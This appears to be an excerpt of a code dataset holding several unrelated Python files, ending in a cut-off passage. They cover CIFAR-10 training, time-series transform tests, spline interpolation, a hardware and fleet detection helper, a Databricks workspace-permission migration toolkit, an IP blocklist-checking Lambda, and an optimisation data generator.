plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n \n \n print(\"Generating Bar Chart of Augmented Data\")\n fig = plot_cf10_data(train_labels[50000:])\n fig.suptitle('Bar Chart of Augmented Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n\n #Plot colour distribution of all the data\n\n print(\"Plotting color distribution of Train data\")\n fig = plot_color_dist(train_data)\n fig.suptitle('Color Histogram of Training Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n \n print(\"Plotting color distribution of Test data\")\n fig = plot_color_dist(test_data)\n fig.suptitle('Color Histogram of Test Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n \n\n return train_data, train_labels, test_data, test_labels\n \n\n\ndef evaluate(accuracy_operation,x,y,X_data, y_data,batch_size):\n \"\"\"Evaluate accuracy of training\n Args:\n accuracy_operation: Accuracy operation\n x: TF Placeholder for x data\n y: TF Placeholder for y data\n X_data: ndarray of training X data\n y_data: ndarray of labels\n Returns: Accuracy\n \"\"\"\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n generator = image_generator(X_data,y_data,batch_size)\n for offset in range(math.floor(num_examples/batch_size)):\n batch_x, batch_y = next(generator)\n accuracy = sess.run(accuracy_operation, feed_dict={x: batch_x, y: batch_y})\n total_accuracy += (accuracy * len(batch_x))\n return total_accuracy / num_examples\n\n\n\ndef train(train_data, train_labels,epochs,batch_size,cross_entropy_count, validation_count):\n \n x = tf.placeholder(tf.float32, (None, 32, 32,1))\n y = tf.placeholder(tf.int32, (None))\n dropout_rate = tf.placeholder(tf.float32,[], (None))\n one_hot_y = tf.one_hot(y, 10)\n\n learning_rate = 0.001\n dropout = 0.5\n \n #logits, cross entropy loss and optimization functions\n logits = train_model(x,dropout_rate=dropout_rate)\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=one_hot_y)\n loss_operation = tf.reduce_mean(cross_entropy)\n optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate)\n training_operation = optimizer.minimize(loss_operation)\n\n\n correct_prediction = tf.equal(tf.argmax(logits, 1, name=\"logits\"), tf.argmax(one_hot_y, 1, name=\"labels\"))\n accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n\n X_train, X_valid, y_train, y_valid = train_test_split(train_data, train_labels, test_size=0.1, random_state=42)\n\n\n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n num_examples = len(X_train)\n\n print(\"Training...\")\n count=1\n for i in range(epochs):\n generator = image_generator(X_train,y_train,batch_size)\n print(\"Epoch {}/{}\".format(i+1,epochs))\n\n for offset in range(math.floor(num_examples/batch_size)):\n batch_x, batch_y = next(generator)\n sess.run(training_operation, feed_dict={x: batch_x, y: batch_y, dropout_rate: dropout})\n if(count%cross_entropy_count==0):\n cross_entropy_loss = sess.run(loss_operation, feed_dict={x: batch_x, y: batch_y, dropout_rate: dropout}) \n print(\"Cross Entropy loss count {}: {}\".format(count,cross_entropy_loss))\n count+=1\n if(count%validation_count==0):\n validation_accuracy = evaluate(accuracy_operation,x,y,X_valid, y_valid,batch_size)\n print(\"EPOCH {} ...\".format(i+1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n\n\n\n\n saver.save(sess, './mynetwork')\n print(\"Model saved\")\n\ndef test_accuracy(test_data, test_labels):\n with tf.Session() as sess:\n saver = tf.train.Saver()\n saver.restore(sess, tf.train.latest_checkpoint('.'))\n\n test_accuracy = evaluate(test_data, test_labels)\n print(\"Test Accuracy = {:.3f}\".format(test_accuracy))\n\n\n \n\ndef main():\n parser = argparse.ArgumentParser(description='Run a training of cfar10 dataset.')\n parser.add_argument(\n 'images_path',\n type=str,\n help='Path to folder containing extracted cfar10 batches and labels for instance \"cfar10/\"'\n )\n parser.add_argument(\n '--b',\n type=int,\n default=128,\n help='Batch size: default=128.')\n parser.add_argument(\n '--e',\n type=int,\n default=10,\n help='Number of Epochs: default=10.')\n \n parser.add_argument(\n '--c',\n type=int,\n default=10,\n help='Number of Steps to run before showing Cross Entropy Loss: default=10')\n \n \n parser.add_argument(\n '--v',\n type=int,\n default=100,\n help='Number of Steps to run before showing validation loss: default=100')\n \n parser.add_argument(\n '--f',\n type=int,\n default=5,\n help='Fraction of total dataset to add through data augmentation: default=5')\n \n \n \n args = parser.parse_args()\n\n #run algorithm\n train_data, train_labels, test_data, test_labels = load_preprocess_and_visualize(args.images_path,args.f)\n train(train_data, train_labels, args.e, args.b, args.c, args.v)\n test_accuracy(test_data, test_labels)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","repo_name":"scneba/ClassificationTensorFlow","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72826287842","text":"# -----------------------------------------------------------\n# Test lead lag and multi-delayed transformations\n#\n# (C) 2020 Kevin Schlegel, Oxford, United Kingdom\n# Released under Apache License, Version 2.0\n# email kevinschlegel@cantab.net\n# -----------------------------------------------------------\nimport numpy as np\n\nfrom psfdataset.transforms.temporal import LeadLagTransformation\nfrom psfdataset.transforms.temporal import MultiDelayedTransformation\n\n\nclass TestLeadLag:\n def test_LeadLagTransformation(self):\n test_input = np.array([[[1, 2], [2, 3], [3, 4], [4, 5]]])\n # Test standard lead-lag transformation, delayed by 1 time step\n llt = LeadLagTransformation(1)\n expected = np.array([[[[1, 2], [1, 2]], [[2, 3], [1, 2]],\n [[2, 3], [2, 3]], [[3, 4], [2, 3]],\n [[3, 4], [3, 4]], [[4, 5], [3, 4]],\n [[4, 5], [4, 5]]]])\n output = llt(test_input)\n np.testing.assert_array_equal(output, expected)\n assert output.dtype == test_input.dtype\n\n # Test lead lag with bigger delay interval\n llt = LeadLagTransformation(2)\n expected = ([[[[1, 2], [1, 2], [1, 2]], [[2, 3], [1, 2], [1, 2]],\n [[2, 3], [2, 3], [1, 2]], [[2, 3], [2, 3], [2, 3]],\n [[3, 4], [2, 3], [2, 3]], [[3, 4], [3, 4], [2, 3]],\n [[3, 4], [3, 4], [3, 4]], [[4, 5], [3, 4], [3, 4]],\n [[4, 5], [4, 5], [3, 4]], [[4, 5], [4, 5], [4, 5]]]])\n output = llt(test_input)\n np.testing.assert_array_equal(output, expected)\n\n # Test a 1D input\n test_input = np.array([[[1], [2], [3]]])\n exp = np.array([[[[1], [1], [1]], [[2], [1], [1]], [[2], [2], [1]],\n [[2], [2], [2]], [[3], [2], [2]], [[3], [3], [2]],\n [[3], [3], [3]]]])\n output = llt(test_input)\n np.testing.assert_array_equal(output, exp)\n assert isinstance(llt.get_description(), dict)\n\n def test_MultiDelayedTransformation(self):\n test_input = np.array([[[1, 2], [2, 3], [3, 4], [4, 5]]])\n # Test the with just a single time step delay\n mdt = MultiDelayedTransformation(1)\n expected = np.array([[[[1, 2], [0, 0]], [[2, 3], [1, 2]],\n [[3, 4], [2, 3]], [[4, 5], [3, 4]],\n [[0, 0], [4, 5]]]])\n output = mdt(test_input)\n np.testing.assert_array_equal(output, expected)\n assert output.dtype == test_input.dtype\n\n # Test with multiple time step delay\n mdt = MultiDelayedTransformation(2)\n exp = np.array([[[[1, 2], [0, 0], [0, 0]], [[2, 3], [1, 2], [0, 0]],\n [[3, 4], [2, 3], [1, 2]], [[4, 5], [3, 4], [2, 3]],\n [[0, 0], [4, 5], [3, 4]], [[0, 0], [0, 0], [4, 5]]]])\n output = mdt(test_input)\n np.testing.assert_array_equal(output, exp)\n assert isinstance(mdt.get_description(), dict)\n","repo_name":"kschlegel/PSFDataset","sub_path":"tests/test_leadlag.py","file_name":"test_leadlag.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5495934952","text":"import numpy\n\n\ndef input_values():\n ##### EXAMPLES #####\n\n # def function(x): return numpy.tan(x)\n #\n # left_border, dots_count, right_border = 0, 6, 1.5\n\n # def function(x): return numpy.sinh(x)\n #\n # left_border, dots_count, right_border = 0, 6, 2\n\n ##### EXAMPLES #####\n\n def function(x): return numpy.cosh(x) # func of my var\n\n left_border, dots_count, right_border = 0, 6, 2\n\n dots = []\n for i in range(dots_count):\n x = left_border + (right_border - left_border) * i / (dots_count - 1)\n y = function(x)\n dots += [(x, y)]\n\n return dots, function\n\n\nprint(\"Интерполяция сплайнами\\n\")\n\ndots, f = input_values()\n(x, y) = map(list, zip(*dots))\nprint(\"(x,y) =\", dots, '\\n')\n\n\ndef triple_diagonal_solve(A, b):\n A = A.copy()\n b = b.copy()\n n = len(A)\n\n A[0][1] /= A[0][0]\n for i in range(1, n - 1):\n A[i][i + 1] /= (A[i][i] - A[i][i - 1] * A[i - 1][i])\n\n b[0] /= A[0][0]\n for i in range(1, n):\n b[i] = (b[i] - A[i][i - 1] * b[i - 1]) / (A[i][i] - A[i][i - 1] * A[i - 1][i])\n\n x = numpy.zeros(n)\n x[-1] = b[-1]\n for i in range(n - 2, -1, -1):\n x[i] = b[i] - A[i][i + 1] * x[i + 1]\n\n return x\n\n\ndef spline_method(dots):\n n = len(dots) - 1\n (x, y) = map(list, zip(*dots))\n\n h = [None]\n for i in range(1, n + 1):\n h += [x[i] - x[i - 1]]\n\n A = [[None] * (n) for i in range(n)]\n for i in range(1, n):\n for j in range(1, n):\n A[i][j] = 0.0\n for i in range(1, n - 1):\n A[i + 1][i] = h[i + 1]\n for i in range(1, n):\n A[i][i] = 2 * (h[i] + h[i + 1])\n for i in range(1, n - 1):\n A[i][i + 1] = h[i + 1]\n\n F = []\n for i in range(1, n):\n F += [3 * ((y[i + 1] - y[i]) / h[i + 1] - (y[i] - y[i - 1]) / h[i])]\n\n A = [A[i][1:] for i in range(len(A)) if i]\n\n c = triple_diagonal_solve(A, F)\n c = [0.0] + list(c) + [0.0]\n\n def evaluate(x_dot):\n for i in range(1, len(x)):\n if x[i - 1] <= x_dot <= x[i]:\n val = 0\n val += y[i]\n b = (y[i] - y[i - 1]) / h[i] + (2 * c[i] + c[i - 1]) * h[i] / 3\n val += b * (x_dot - x[i])\n val += c[i] * ((x_dot - x[i]) ** 2)\n d = (c[i] - c[i - 1]) / (3 * h[i])\n val += d * ((x_dot - x[i]) ** 3)\n return val\n return None\n\n def output():\n print(\"Кубический сплайн: \", '\\n')\n for i in range(1, len(x)):\n val = 0\n b = (y[i] - y[i - 1]) / h[i] + (2 * c[i] + c[i - 1]) * h[i] / 3\n d = (c[i] - c[i - 1]) / (3 * h[i])\n print(x[i - 1], x[i], )\n print(numpy.poly1d([d, c[i], b, y[i]]), '\\n')\n\n return evaluate, output\n\n\nspl, cout = spline_method(dots)\n\ncout()\n\nx_dot = 1.0 # my variant & second example\n# x_dot = 0.75 # first example\nprint(f\"Исходная функция от ({x_dot}) = \", f(x_dot))\nprint(f\"Кубический сплайн от ({x_dot}) = \", spl(x_dot))\nprint(f\"Дельта от ({x_dot}) = \", abs(f(x_dot) - spl(x_dot)))\n","repo_name":"Artyom-Gerchik/MchaLabs","sub_path":"LAB7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26244319278","text":"\"\"\"\nThis module provides a set of functions to extract information about\nthe Single Board Computer in use.\nIt considers Balena environment variables as primary source of truth.\nIt also uses the device tree to extract information about the SBC.\n\"\"\"\n\nimport os\nfrom enum import Enum, auto\nfrom collections import namedtuple\n\nSBCInfo = namedtuple('SBCInfo', ['vendor_id', 'vendor_name', 'model_name'])\n\n\nclass DeviceVendorID(Enum):\n \"\"\"\n Enum for device vendors.\n \"\"\"\n INVALID = auto()\n ROCK_PI = auto()\n RASPBERRY_PI = auto()\n BOBCAT_PX30 = auto()\n BOBCAT_RK3566 = auto()\n\n\n# Pulled from\n# https://www.balena.io/docs/reference/base-images/devicetypes/\nBALENA_ENV_RASPBERRY_PI_MODELS = [\n 'raspberry-pi',\n 'raspberry-pi2',\n 'raspberrypi3',\n 'raspberrypi3-64',\n 'raspberrypi4-64',\n 'nebra-hnt',\n 'raspberrypicm4-ioboard',\n 'raspberrypi0-2w-64'\n]\n\nBALENA_ENV_ROCKPI_MODELS = ['rockpi-4b-rk3399']\n\nBALENA_ENV_BOBCATPX30_MODELS = ['isg-503']\n\nBALENA_ENV_BOBCATRK3566_MODELS = ['rockpro64']\n\nBALENA_MODELS = {\n DeviceVendorID.BOBCAT_PX30: BALENA_ENV_BOBCATPX30_MODELS,\n DeviceVendorID.BOBCAT_RK3566: BALENA_ENV_BOBCATRK3566_MODELS,\n DeviceVendorID.ROCK_PI: BALENA_ENV_ROCKPI_MODELS,\n DeviceVendorID.RASPBERRY_PI: BALENA_ENV_RASPBERRY_PI_MODELS\n}\n\nCOMMERCIAL_FLEETS = [\n 156, # Bobcat PX30\n 161, # Bobcat RK3566\n 56, # Controllino\n 106, # COTX\n 53, # Finestra\n 31, # Nebra Indoor 868MHz\n 40, # Nebra Indoor RockPi 868MHz\n 119, # Nebra Indoor 915MHz\n 58, # Nebra Indoor RockPi 915MHz\n 62, # Linxdot\n 42, # Linxdot RKCM3\n 143, # Midas\n 145, # Nebra indoor1\n 147, # Nebra indoor2\n 148, # Nebra outdoor1\n 149, # Nebra outdoor2\n 52, # Helium OG\n 80, # Nebra Outdoor 868MHz\n 107, # Nebra Outdoor 915MHz\n 47, # PantherX\n 66, # Pisces\n 73, # Pycom\n 88, # RAK\n 114, # RisingHF\n 124, # Sensecap\n 90, # Syncrobit\n 126, # Syncrobit RKCM3\n 98, # Nebra Indoor Testing\n 158, # Bobcat PX30 Testing\n 163, # Bobcat RK3566 Testing\n 127, # Controllino Testing\n 87, # COTX Testing\n 76, # Finestra Testing\n 132, # Linxdot Testing\n 84, # Linxdot RKCM3 Testing\n 144, # Midas Testing\n 128, # Helium OG Testing\n 41, # PantherX Testing\n 43, # Pisces Testing\n 116, # Pycom Testing\n 113, # RAK Testing\n 103, # RisingHF Testing\n 60, # Nebra RockPi Testing\n 137, # Sensecap Testing\n 57, # Syncrobit Testing\n 111, # Syncrobit RKCM3 Testing\n 2006816, # Rob Testing\n 2061340, # Rob Testing\n]\n\nNON_COMMERCIAL_FLEETS = [\n 67, # dev-1\n 54, # dev-2\n 74, # dev-3\n 25, # devnet-01\n 26, # devnet-02\n 150, # devnet-03\n 153, # dev-sensorhub\n 121, # Bobcat PX30\n 160, # Bobcat RK3566\n 105, # Controllino\n 136, # COTX\n 99, # Disputed\n 118, # Finestra\n 109, # Indoor 470\n 39, # Indoor 868\n 134, # Indoor 868 RockPi\n 91, # Indoor 915\n 122, # Indoor 915 RockPi\n 46, # Linxdot\n 68, # Linxdot RKCM3\n 138, # Midas\n 3, # Indoor1\n 27, # Indoor2\n 28, # Outdoor1\n 29, # Outdoor2\n 104, # OG\n 79, # Outdoor 470\n 63, # Outdoor 868\n 133, # Outdoor 915\n 94, # Outdoor 915 RockPi\n 32, # Panther X1\n 71, # Pisces\n 83, # Pycom\n 78, # RAK\n 85, # RisingHF\n 101, # Sensecap\n 130, # Syncrobit\n 69, # Syncrobit RKCM3\n 123, # Testnet\n 157, # Bobcat PX30 Testnet\n 162, # Bobcat RK3566 Testnet\n 102, # Controllino Testnet\n 86, # COTX Testnet\n 77, # Finestra Testnet\n 117, # Linxdot Testnet\n 110, # Linxdot RKCM3 Testnet\n 139, # Midas Testnet\n 70, # OG Testnet\n 129, # Panther X1 Testnet\n 125, # Pisces Testnet\n 131, # Pycom Testnet\n 36, # RAK Testnet\n 55, # Rising HF Testnet\n 95, # RockPi Testnet\n 75, # Sensecap Testnet\n 97, # Syncrobit Testnet\n 37, # Syncrobit RKCM3 Testnet\n 22, # Indoor2 Testnet\n]\n\nNEBRA_API_URL = \"https://api.cloud.nebra.com\"\n\ndef device_model():\n with open('/proc/device-tree/model', 'r') as f:\n return f.readline().strip()\n\n\ndef sbc_info() -> SBCInfo:\n '''\n return SBCInfo formed by reading '/proc/device-tree/model'\n '''\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.INVALID, vendor_name='', model_name='')\n dev_model = device_model()\n if dev_model.lower().find('raspberry') >= 0:\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.RASPBERRY_PI,\n vendor_name='Raspberry Pi',\n model_name=dev_model)\n elif dev_model.lower().find('rk3566') >= 0:\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.BOBCAT_RK3566,\n vendor_name='Bobcat',\n model_name=dev_model)\n elif dev_model.lower().find('rock') >= 0:\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.ROCK_PI,\n vendor_name='Radxa Rock Pi',\n model_name=dev_model)\n elif dev_model.lower().find('px30') >= 0:\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.BOBCAT_PX30,\n vendor_name='Bobcat',\n model_name=dev_model)\n return sbc_info\n\n\ndef is_sbc_type(device_id: DeviceVendorID) -> bool:\n '''\n Return true if the sbc matches the type supplied.\n '''\n device_type = os.getenv('BALENA_DEVICE_TYPE')\n\n # use device tree supplied model name if evn not set\n if not device_type:\n return sbc_info().vendor_id == device_id\n\n # honor env override\n return device_type in BALENA_MODELS.get(device_id, [])\n\n\ndef is_commercial_fleet() -> bool:\n '''\n Return true if the device is in a commercial fleet. Otherwise return false.\n '''\n fleet_name = os.environ.get('BALENA_APP_NAME')\n fleet_id = int(os.environ.get('BALENA_APP_ID'))\n\n if not fleet_name.endswith('-c') or fleet_id not in COMMERCIAL_FLEETS:\n return False\n\n return True\n\n\ndef is_nebra_fleet() -> bool:\n '''\n Return true if the device is in a Nebra Cloud fleet. Otherwise return false.\n '''\n api_url = os.environ.get('BALENA_API_URL')\n fleet_id = int(os.environ.get('BALENA_APP_ID'))\n\n if (api_url != NEBRA_API_URL) or (fleet_id not in COMMERCIAL_FLEETS and fleet_id not in NON_COMMERCIAL_FLEETS):\n return False\n\n return True\n","repo_name":"NebraLtd/hm-pyhelper","sub_path":"hm_pyhelper/sbc.py","file_name":"sbc.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"71097600803","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nA = np.load('Documents/att3ntions93.npy')\n\nb=[]\nfor i in range(16):\n b.append([])\nfor r in A:\n s = np.argsort(r)[:16]\n for i in range(len(s)):\n b[i].append(s[i])\n\nc={}\nfor i,k in enumerate(b):\n c[i]={}\n for idx in k:\n if idx not in c[i].keys(): c[i][idx]=0\n else: c[i][idx]+=1\n\nd={}\nfor k,v in c.items():\n for kk,vv in c[k].items():\n if kk not in d.keys(): d[kk]=0\n d[kk]+= ((100-k)/100)*(vv+1)\n\nregions = {76:'left frontal pole', 75:'left supremarginal gyrus', 74:'left superior temporal gyrus', 77:'left temporal pole', 72:'left superior frontal gyrus', 73:'left superior parietal lobule', 78:'left transverse temporal gyrus', 79:'left insula', 71:'left rostral middle frontal gyrus', 70:'left ronstral anterior cingulate cortex', 69:'left precuneus', 68:'left precentral gyrus', 81:'right banks of the superior temporal sulcus', 67:'left posterior cingulate cortex', 66:'left postcentral gyrus', 83:'right caudal middle frontal gyrus'}\n\ne = dict([(regions[k],v/max(d.values())) for k,v in d.items() if k in regions.keys()])\nsv = sorted(e.values(), reverse=True)\n\nf={}\nfor s in sv:\n for k,v in e.items():\n if v==s:\n f[k]=v\n\nsns.set(style=\"whitegrid\")\nfig, ax = plt.subplots(figsize=(6, 15))\n# sns.set_color_codes(\"pastel\")\npal = sns.cubehelix_palette(len(f.keys()))\n# cmap = sns.cubehelix_palette(as_cmap=True)\nsns.barplot(x=list(f.values()), y=list(f.keys()),\n label=\"Region Weighting\", palette=np.array(pal[::-1]))\nplt.savefig('Documents/attentions.png',bbox_inches='tight')\n","repo_name":"xtianmcd/GCNeuro","sub_path":"attentions_analy.py","file_name":"attentions_analy.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"620059848","text":"import logging\n\nfrom databricks.sdk import WorkspaceClient\nfrom databricks.sdk.service import sql\n\nfrom databricks.labs.ucx.config import WorkspaceConfig\nfrom databricks.labs.ucx.framework.crawlers import (\n RuntimeBackend,\n SqlBackend,\n StatementExecutionBackend,\n)\nfrom databricks.labs.ucx.workspace_access.generic import (\n GenericPermissionsSupport,\n authorization_listing,\n experiments_listing,\n listing_wrapper,\n models_listing,\n workspace_listing,\n)\nfrom databricks.labs.ucx.workspace_access.groups import GroupManager\nfrom databricks.labs.ucx.workspace_access.manager import PermissionManager\nfrom databricks.labs.ucx.workspace_access.redash import (\n SqlPermissionsSupport,\n redash_listing_wrapper,\n)\nfrom databricks.labs.ucx.workspace_access.scim import ScimSupport\nfrom databricks.labs.ucx.workspace_access.secrets import SecretScopesSupport\nfrom databricks.labs.ucx.workspace_access.verification import VerificationManager\n\n\nclass GroupMigrationToolkit:\n def __init__(self, config: WorkspaceConfig, *, warehouse_id=None):\n self._configure_logger(config.log_level)\n\n ws = WorkspaceClient(config=config.to_databricks_config())\n ws.api_client._session.adapters[\"https://\"].max_retries.total = 20\n self._verify_ws_client(ws)\n self._ws = ws # TODO: remove this once notebooks/toolkit.py is removed\n\n generic_acl_listing = [\n listing_wrapper(ws.clusters.list, \"cluster_id\", \"clusters\"),\n listing_wrapper(ws.cluster_policies.list, \"policy_id\", \"cluster-policies\"),\n listing_wrapper(ws.instance_pools.list, \"instance_pool_id\", \"instance-pools\"),\n listing_wrapper(ws.warehouses.list, \"id\", \"sql/warehouses\"),\n listing_wrapper(ws.jobs.list, \"job_id\", \"jobs\"),\n listing_wrapper(ws.pipelines.list_pipelines, \"pipeline_id\", \"pipelines\"),\n listing_wrapper(experiments_listing(ws), \"experiment_id\", \"experiments\"),\n listing_wrapper(models_listing(ws), \"id\", \"registered-models\"),\n workspace_listing(ws, num_threads=config.num_threads, start_path=config.workspace_start_path),\n authorization_listing(),\n ]\n redash_acl_listing = [\n redash_listing_wrapper(ws.alerts.list, sql.ObjectTypePlural.ALERTS),\n redash_listing_wrapper(ws.dashboards.list, sql.ObjectTypePlural.DASHBOARDS),\n redash_listing_wrapper(ws.queries.list, sql.ObjectTypePlural.QUERIES),\n ]\n generic_support = GenericPermissionsSupport(ws, generic_acl_listing)\n sql_support = SqlPermissionsSupport(ws, redash_acl_listing)\n secrets_support = SecretScopesSupport(ws)\n scim_support = ScimSupport(ws)\n self._permissions_manager = PermissionManager(\n self._backend(ws, warehouse_id),\n config.inventory_database,\n [generic_support, sql_support, secrets_support, scim_support],\n self._object_type_appliers(generic_support, sql_support, secrets_support, scim_support),\n )\n self._group_manager = GroupManager(ws, config.groups)\n self._verification_manager = VerificationManager(ws, secrets_support)\n\n @staticmethod\n def _object_type_appliers(generic_support, sql_support, secrets_support, scim_support):\n return {\n # SCIM-based API\n \"entitlements\": scim_support,\n \"roles\": scim_support,\n # Generic Permissions API\n \"authorization\": generic_support,\n \"clusters\": generic_support,\n \"cluster-policies\": generic_support,\n \"instance-pools\": generic_support,\n \"sql/warehouses\": generic_support,\n \"jobs\": generic_support,\n \"pipelines\": generic_support,\n \"experiments\": generic_support,\n \"registered-models\": generic_support,\n \"notebooks\": generic_support,\n \"files\": generic_support,\n \"directories\": generic_support,\n \"repos\": generic_support,\n # Redash equivalent of Generic Permissions API\n \"alerts\": sql_support,\n \"queries\": sql_support,\n \"dashboards\": sql_support,\n # Secret Scope ACL API\n \"secrets\": secrets_support,\n }\n\n @staticmethod\n def _backend(ws: WorkspaceClient, warehouse_id: str | None = None) -> SqlBackend:\n if warehouse_id is None:\n return RuntimeBackend()\n return StatementExecutionBackend(ws, warehouse_id)\n\n @staticmethod\n def _verify_ws_client(w: WorkspaceClient):\n _me = w.current_user.me()\n is_workspace_admin = any(g.display == \"admins\" for g in _me.groups)\n if not is_workspace_admin:\n msg = \"Current user is not a workspace admin\"\n raise RuntimeError(msg)\n\n @staticmethod\n def _configure_logger(level: str):\n ucx_logger = logging.getLogger(\"databricks.labs.ucx\")\n ucx_logger.setLevel(level)\n\n def prepare_environment(self):\n self._group_manager.prepare_groups_in_environment()\n\n def cleanup_inventory_table(self):\n self._permissions_manager.cleanup()\n\n def inventorize_permissions(self):\n self._permissions_manager.inventorize_permissions()\n\n def apply_permissions_to_backup_groups(self):\n self._permissions_manager.apply_group_permissions(\n self._group_manager.migration_groups_provider, destination=\"backup\"\n )\n\n def verify_permissions_on_backup_groups(self, to_verify):\n self._verification_manager.verify(self._group_manager.migration_groups_provider, \"backup\", to_verify)\n\n def replace_workspace_groups_with_account_groups(self):\n self._group_manager.replace_workspace_groups_with_account_groups()\n\n def apply_permissions_to_account_groups(self):\n self._permissions_manager.apply_group_permissions(\n self._group_manager.migration_groups_provider, destination=\"account\"\n )\n\n def verify_permissions_on_account_groups(self, to_verify):\n self._verification_manager.verify(self._group_manager.migration_groups_provider, \"account\", to_verify)\n\n def delete_backup_groups(self):\n self._group_manager.delete_backup_groups()\n","repo_name":"rohit-db/ucx","sub_path":"src/databricks/labs/ucx/workspace_access/migration.py","file_name":"migration.py","file_ext":"py","file_size_in_byte":6229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"73680376481","text":"'''\nIP Filter lambda\n'''\nfrom lambda_ip_filter.get_ip import getBaseIP\n\n\nurl ='https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/blocklist_de.ipset'\n\n#Read IP from IPset\nclient_whitelisted_ip = getBaseIP(url)\n\ndef lambda_handler(event, context):\n try:\n \n ip_match = []\n non_ip_address_match = []\n ip_array = event[\"ip_address\"]\n\n for ip in ip_array:\n if ip in client_whitelisted_ip:\n ip_match.append(ip)\n else:\n non_ip_address_match.append(ip)\n \n response = {\n \"status\": 200,\n \"body\": {\n \"number_of_matching_ip\": len(ip_match),\n \"number_of_non_matching_address\": len(non_ip_address_match),\n \"ip_address_match\": ip_match,\n \"ip_address_non_match\": non_ip_address_match\n }\n }\n \n return response\n \n except Exception as e:\n \n response = {\n \"status\": \"500\",\n \"message\": f\"An error occured: {str(e)}\",\n }","repo_name":"adefemi171/ip-white-list","sub_path":"lambda_ip_filter/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2888466901","text":"import gurobipy as gp \nimport numpy as np \nimport networkx as nx\n\n\nimport pickle\nimport sys\nimport datetime\nimport math\nfrom sklearn import preprocessing\nfrom sklearn.metrics import confusion_matrix\nimport logging \nimport time\nfrom collections import defaultdict\nfrom sklearn.metrics import mean_squared_error as mse\nfrom scipy.special import expit, logit\nimport copy\n\ntrue=True\nrand=np.random.binomial\n\n\n''' Helper functions to generate opt problem \n'''\ndef zeros(d1,d2):\n return np.zeros([d1,d2])\ndef vcat(a1,a2):\n return np.vstack([a1,a2])\ndef ones(*args): \n return np.ones(list(args))\n\ndef length(x): \n return len(x)\ndef convert_grid_to_list(dim1, dim2):\n g = nx.grid_2d_graph(dim1, dim2)\n sources = []; destinations = []\n nodelist=[node for node in g.nodes]\n n_edges = len([e for e in g.edges])\n scalar_nodes = dict( zip(nodelist,range(len(nodelist))))\n tuple_nodes = dict( zip(range(len(nodelist)), nodelist) )\n print(scalar_nodes)\n for e in g.edges:\n sources += [scalar_nodes[e[0]]]\n destinations += [scalar_nodes[e[1]]]\n # unit test\n# print([(tuple_nodes[sources[i]], tuple_nodes[destinations[i]]) for i in range(len(sources))])\n# print(g.edges)\n return sources, destinations, scalar_nodes, tuple_nodes\n\n\n###########\n# Generate data \n\n\"\"\"\ngenerate_poly_kernel_data(B_true, n, degree; inner_constant=1, outer_constant = 1, kernel_damp_normalize=true,\n kernel_damp_factor=1, noise=true, noise_half_width=0, normalize_c=true)\n\nGenerate (X, c) from the polynomial kernel model X_{ji} ~ N(0, 1) and\nc_i(j) = ( (alpha_j * B_true[j,:] * X[:,i] + inner_constant)^degree + outer_constant ) * epsilon_{ij} where\nalpha_j is a damping term and epsilon_{ij} is a noise term.\n\n# Arguments\n- `kernel_damp_normalize`: if true, then set\nalpha_j = kernel_damp_factor/norm(B_true[j,:]). This results in\n(alpha_j * B_true[j,:] * X[:,i] + inner_constant) being normally distributed with\nmean inner_constant and standard deviation kernel_damp_factor.\n- `noise`: if true, generate epsilon_{ij} ~ Uniform[1 - noise_half_width, 1 + noise_half_width]\n- `normalize_c`: if true, normalize c at the end of everything\n\"\"\"\ndef generate_poly_kernel_data_simple(B_true, n, degree, inner_constant=1, outer_constant = 1, kernel_damp_normalize=true,\nkernel_damp_factor=1, noise=true, noise_half_width=0, normalize_c=true, normalize_small_threshold = 0.0001):\n\n (d, p) = B_true.shape\n X_observed = np.random.randn(p, n)\n dot_prods = B_true@X_observed\n # first generate c_observed without noise\n c_observed = zeros(d, n)\n for j in range(d):\n cur_kernel_damp_factor = kernel_damp_factor\n for i in range(n): \n c_observed[j, i] = (cur_kernel_damp_factor*dot_prods[j, i] + inner_constant)**degree + outer_constant\n if noise:\n epsilon = (1 - noise_half_width) + 2*noise_half_width*np.random.random()\n c_observed[j, i] = c_observed[j, i]*epsilon\n return X_observed, c_observed\n\ndef get_weighted_predictors(regressor, c_train, X_train,weights=None, random_regr=False):\n [d,n_train] = c_train.shape\n predictors = {}\n for d_ in range(d): \n \t# If random: fix random state for refitting\n if random_regr: 